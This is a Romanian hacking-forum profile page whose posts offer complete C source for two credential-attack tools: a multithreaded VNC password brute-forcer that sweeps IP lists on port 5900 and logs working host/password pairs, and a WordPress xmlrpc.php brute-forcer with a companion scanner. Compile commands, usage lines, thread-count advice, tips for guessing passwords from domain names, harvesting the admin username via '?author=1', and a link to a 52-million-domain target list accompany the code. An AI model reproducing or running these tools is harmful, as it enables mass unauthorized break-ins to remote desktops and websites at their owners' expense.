Jump to content

sssmoke

Members
  • Content Count

    4
  • Joined

  • Last visited

Community Reputation

16 Good

About sssmoke

  • Rank
    Registered user
  • Birthday 01/01/1977

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Am vrut sa fac un brute de vncuri, fiindca din cate am vazut pe net, n-am gasit nici unul foarte rapid. Folosirea e simpla, aveti nevoie de openssl instalat si il compilati cu gcc -o vnc vnc.c -lcrypto -lpthread. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <openssl/des.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <signal.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <pthread.h> #include <ctype.h> #define RED "\E[1;32;31m" #define GREEN "\E[1;32;40m" #define WHITE "\E[1;37;40m" #define NORMAL "\E[m" #define CLEARLN "\033[F\033[J" #define CONNECT_TIMEOUT 2 #define READ_TIMEOUT 5 #define LOCK(x) pthread_mutex_lock(&x); #define UNLOCK(x) pthread_mutex_unlock(&x); static int maxqueue = 0; static int brutemode = 0; struct host_queue{ char * host; char * pass; struct host_queue * next; }; struct combi { char * host; char * pass; }; static time_t start, lmin; static FILE *ipfile = NULL; static FILE *outfile = NULL; static FILE *passfile = NULL; static int finished = 0; static int done = 0; static int good = 0; static int total = 0; static long qsize = 0; static long lastmin = 0; static int dmin = 0; static struct host_queue * jobs = NULL; static pthread_mutex_t stat_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t job_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_cond_t job_cond = PTHREAD_COND_INITIALIZER; static pthread_cond_t job_size_cond = PTHREAD_COND_INITIALIZER; static void usage(const char *s) { printf(RED"Usage: %s <check|brute>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_check(const char *s) { printf(RED"Usage: %s check <vnc list> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_brute(const char *s) { printf(RED"Usage: %s brute <vnc list> <passfile> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void save_no_auth(const char *host) { FILE *noauth = fopen("no.auth", "a+"); fprintf(noauth, "%s\n", host); fclose(noauth); } static void save_vnc_list(const char *host) { FILE *vnclist= fopen("vnc.list", "a+"); fprintf(vnclist, "%s\n", host); fclose(vnclist); } static void queue_job(char *h, char *p) { struct host_queue * hq = (struct host_queue *) malloc(sizeof(struct host_queue)); hq->host = h; hq->pass = p; hq->next = NULL; LOCK(job_lock); while(qsize >= maxqueue) pthread_cond_wait(&job_size_cond, &job_lock); if(jobs == NULL) jobs = hq; else { hq->next = jobs; jobs = hq; } ++qsize; pthread_cond_signal(&job_cond); UNLOCK(job_lock); } static struct combi * dequeue_job(void){ struct combi * trynow = (struct combi *) malloc(sizeof(struct combi)); LOCK(job_lock); while(jobs == NULL){ LOCK(stat_lock); if(done == 1){ UNLOCK(stat_lock); UNLOCK(job_lock); free(trynow); return NULL; } UNLOCK(stat_lock); pthread_cond_wait(&job_cond, &job_lock); } trynow->host = jobs->host; trynow->pass = jobs->pass; struct host_queue * hq = jobs; jobs = jobs->next; --qsize; pthread_cond_signal(&job_size_cond); UNLOCK(job_lock); free(hq); return trynow; } static int send_msg(int sockfd, char *message) { int n; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, NULL, &rset, NULL, &timeout); if (n < 0) return -1; else if (n == 0) return -1; else n = send(sockfd, message, strlen(message), MSG_NOSIGNAL); return n; } static int recv_msg(int sockfd, char **retmes) { int n; char *buffer = (char *) malloc(512); bzero(buffer, 512); *retmes = NULL; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, &rset, NULL, NULL, &timeout); if(n <= 0) { free(buffer); return 0; } else n = read(sockfd, buffer, 511); *retmes = buffer; return n; } static char *Encrypt(char *Key, char *Msg, int size, char **dest) { char *Res = NULL; int n=0; DES_cblock Key2, decry, plain1, plain2, result1, result2; DES_key_schedule schedule; Res = (char *) malloc(size + 1); bzero(Res, size + 1); memcpy(Key2, Key, 8); memcpy(plain1, Msg, 8); memcpy(plain2, Msg + 8, 8); DES_set_odd_parity( &Key2 ); DES_set_key(&Key2, &schedule ); DES_ecb_encrypt(&plain1, &result1, &schedule, DES_ENCRYPT); DES_ecb_encrypt(&plain2, &result2, &schedule, DES_ENCRYPT); memcpy(Res, result1, 8); memcpy(Res + 8, result2, 8); *dest = Res; return NULL; } static int checknow(const char *host, const char *pass) { int sockfd, rc, i, n = 0, tmax = 0; long arg; unsigned char newkey[8]; bzero(newkey, 8); for (i=0;i<strlen(pass);i++) { int a = pass[i]; int b = 0; int j; for (j=0; j<8; j++) if (a & (1<<j)) b = b | (1<<7-j); unsigned char d = b; newkey[i] = d; } newkey[i] = '\0'; struct sockaddr_in remoteaddr; remoteaddr.sin_family = AF_INET; remoteaddr.sin_addr.s_addr = inet_addr(host); remoteaddr.sin_port = htons(5900); retry: sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) goto retry; struct linger so_linger; so_linger.l_onoff = 1; so_linger.l_linger = 0; struct timeval tv; int valopt; tv.tv_sec = CONNECT_TIMEOUT; tv.tv_usec = 0; if(setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &so_linger, sizeof so_linger) > 0) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } char *recbuf = NULL; if (connect(sockfd, (struct sockaddr *)&remoteaddr, sizeof(remoteaddr)) < 0) { if (errno == EINPROGRESS) { fd_set write_fds; memset(&write_fds, 0, sizeof(write_fds)); FD_ZERO(&write_fds); FD_SET(sockfd, &write_fds); if (select(sockfd+1, NULL, &write_fds, NULL, &tv) > 0) { socklen_t lon; lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) goto first; } else goto first; } else goto first; } n = recv_msg(sockfd, &recbuf); if(n == 0 || !strstr(recbuf, "RFB 00") || n > 12) goto first; char *proto = malloc(13 * sizeof(char)); bzero(proto, 13); if((recbuf[6] == '3' && recbuf[10] == '8') || (recbuf[6] == '4' && recbuf[10] == '1')) sprintf(proto, "RFB 003.008\n"); else if(recbuf[6] == '3' && recbuf[10] == '7') sprintf(proto, "RFB 003.007\n"); else sprintf(proto, "RFB 003.003\n"); if(send_msg(sockfd, proto) < 0) { free(proto); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n == 0) { free(proto); goto first; } unsigned char *response = malloc(17 * sizeof(char)); bzero(response, 17); int code; if(proto[10] == '7' || proto[10] == '8') { free(proto); int numberauth = recbuf[0], auth_supported = 0; for(i=1; i<numberauth + 1; i++) { if(recbuf[i] == 1) save_no_auth(host); else if(recbuf[i] == 2) auth_supported = 1; } if(auth_supported == 0) { free(response); goto first; } if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); tmax = 3; free(response); goto first; } char authchar[1]; authchar[0] = '\x02'; if(send_msg(sockfd, authchar) < 0) { free(response); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n != 16) { free(response); goto first; } memcpy(response, recbuf, 16); } else { free(proto); code = recbuf[3]; if(code == 1) { save_no_auth(host); free(response); goto first; } else if(code == 2 && n >= 20) { if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); free(response); tmax = 3; goto first; } memcpy(response, recbuf + n - 16, 16); } else { free(response); goto first; } } char *encrypted = NULL; Encrypt(newkey, response, 16, &encrypted); free(response); free(recbuf); if(send_msg(sockfd, encrypted) < 0) { free(encrypted); goto first; } free(encrypted); n = recv_msg(sockfd, &recbuf); if(n != 4) goto first; code = recbuf[3]; long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); if(code == 0) { LOCK(stat_lock); printf(CLEARLN""GREEN"[+] Valid: %s: %s\n\n"NORMAL, host, pass); FILE *logfile = fopen("vnc.good", "a+"); fprintf(logfile, "%s %s\n", host, pass); fclose(logfile); UNLOCK(stat_lock); } first: LOCK(stat_lock); dmin++; finished++; UNLOCK(stat_lock); free(recbuf); close(sockfd); return -1; } static void *worker_thread(void *worker) { while(1) { struct combi *trynow = dequeue_job(); if(trynow == NULL) break; char *host = NULL, *pass = NULL; host = trynow->host; pass = trynow->pass; if(host == NULL || pass == NULL) break; checknow(host, pass); free(trynow); free(host); if(brutemode == 2) free(pass); } pthread_exit(NULL); } int main(int argc, char **argv) { char ip[32] = {0}, pass[32] = {0}; if (argc < 2) usage(argv[0]); if ((strcmp(argv[1], "check") == 0) && (argc != 4)) usage_check(argv[0]); else if((strcmp(argv[1], "brute") == 0) && (argc != 5)) usage_brute(argv[0]); else if(strcmp(argv[1], "check") != 0 && strcmp(argv[1], "brute") != 0) usage(argv[0]); if (strcmp(argv[1], "check") == 0) brutemode = 1; else if(strcmp(argv[1], "brute") == 0) brutemode = 2; int num_threads; char *list_host = NULL, *list_pass = NULL; if (brutemode == 1) { list_host = argv[2]; num_threads = atoi(argv[3]); } else { list_host = argv[2]; list_pass = argv[3]; num_threads = atoi(argv[4]); } maxqueue = num_threads; if(brutemode == 2) printf(WHITE"[*] IP List: %s Passwords: %s Threads: %d Log: vnc.good\n\n"NORMAL, list_host, list_pass, num_threads); else printf(WHITE"[*] IP List: %s Threads: %d Log: vnc.list\n\n"NORMAL, list_host, num_threads); start = time(0); lmin = time(0); if(!(ipfile = fopen(list_host, "r"))) { printf("INVALID IP FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); char **passwords; int pcount=0; if(brutemode == 2) { if(!(passfile = fopen(list_pass, "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) pcount++; } fclose(passfile); passwords = malloc(pcount * sizeof(char*)); pcount = 0; passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) { passwords[pcount] = malloc((strlen(pass)+1)*sizeof(char)); strcpy(passwords[pcount], pass); pcount++; } } fclose(passfile); } int i; pthread_t *thread = (pthread_t *) malloc(sizeof(pthread_t)*num_threads); pthread_attr_t attrs; pthread_attr_init(&attrs); pthread_attr_setdetachstate(&attrs, PTHREAD_CREATE_DETACHED); for(i=0; i<num_threads; i++) { pthread_create(&thread[i], &attrs, worker_thread, NULL); pthread_detach(thread[i]); } if(brutemode == 1) { ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); strcpy(host, ip); queue_job(host, "checkmod"); } } fclose(ipfile); } else { int pc=0; for(pc=0; pc<pcount; pc++) { printf(CLEARLN""WHITE"[+]Working now with: %s\n\n"NORMAL, passwords[pc]); ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); char *pass = (char *)malloc(strlen(passwords[pc]) + 1); strcpy(host, ip); strcpy(pass, passwords[pc]); queue_job(host, pass); } } fclose(ipfile); } } done=1; for(i=0; i < num_threads; i++) pthread_cond_signal(&job_cond); pthread_mutex_destroy(&job_lock); pthread_cond_destroy(&job_cond); sleep(20); free(thread); exit(0); } Daca aveti lista de ipuri si vreti doar sa verificati care au VNC si suporta autentificare dati: ./vnc check listaipuri numarthreaduri Daca doriti sa faceti bruteforce direct: ./vnc brute listaipuri listaparole numarthreaduri Daca gasiti vreun bug sau aveti sugestii de imbunatatire lasati mesaj
  2. La parola poti folosi DOMAIN% sau DOMAIN%123 din astea asa si iti inlocuieste domeniul ex: Google cu google sau google123 cum vrei tu. La useri singurul fel care cred eu ca merge updatat e sa ia userul din pagina ?author=1 ca ala e admin, alti useri nu stiu cat de mult conteaza...
  3. Aici aveti si o lista de 52mil domenii sa nu va plictisiti gangsta.club/xdom.txt
  4. Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php. ===== brute.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE WP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[1024], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>"); strcat(postvar, pass); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd,buffer,2047); if (n < 0) { exit(1); } if(strstr(buffer, "isAdmin")) { printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass); outfile = fopen("wp.log", "a+"); fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass); fclose(outfile); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000]; processed[0]=0; time_t start; if (argc < 5) usage(argv[0]); printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); if(!(userfile = fopen(argv[2], "r"))) { printf("INVALID USERS FILE: %s\n", argv[2]); exit(0); } fclose(userfile); if(!(passfile = fopen(argv[3], "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+"); fclose(badfile); if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+"); fclose(badfile); userfile = fopen(argv[2], "r"); while(1) { if(!fgets((char *)&user, sizeof(user), userfile)) break; if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0'; if (user) { passfile = fopen(argv[3], "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass) { badfile = fopen("wp.log", "r"); strcpy(processed, ""); while (1) { if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break; strcat(processed, invtmp); } fclose(badfile); ipfile = fopen(argv[1], "r"); while (1) { if(!fgets((char *)&tok, sizeof(tok), ipfile)) break; if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0'; if (tok) { char ip2[256], pass2[256]; ip = strtok(tok, " "); link = strtok(NULL, " "); strcpy(ip2, ip); strcpy(pass2, pass); if(strstr(pass2, "DOMAIN%")) { if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0'; if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0'; if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0'; if(strstr(ip2, "www.")) { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=4;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } else { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=0;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } } if(!strstr(processed, ip)) { if(!(fork())) { getvuln(ip,user,pass2,outfile,link); exit(0); } else { numforks++; if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL); } } } } fclose(ipfile); } } fclose(passfile); } } fclose(userfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } ===== checker.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *link, FILE *outfile); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE SMTP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <IPs file> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *link, FILE *outfile) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[2048], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55"); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd, buffer, 2047); if (n < 0) { exit(1); } if(strstr(buffer, "<int>403</int>")) { printf("[+]Found: %s - %s\n", victim, link); fprintf(outfile, "%s %s\n", victim, link); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char ip[1024]; time_t start; if (argc < 2) usage(argv[0]); outfile = fopen("out.log", "a+"); printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0'; if (ip) { if(!(fork())) { getvuln(ip,"/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } if(!(fork())) { getvuln(ip,"/blog/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } } } fclose(ipfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } Pentru compilare: gcc -o checker checker.c gcc -o brute brute.c Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log. Usage: ./checker <IPs file> <threads> Pentru a incepe brute faceti o lista de useri, una de parole si porniti: ./brute out.log users.txt passwords.txt <threads> Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400. Astept sugestii
×
×
  • Create New...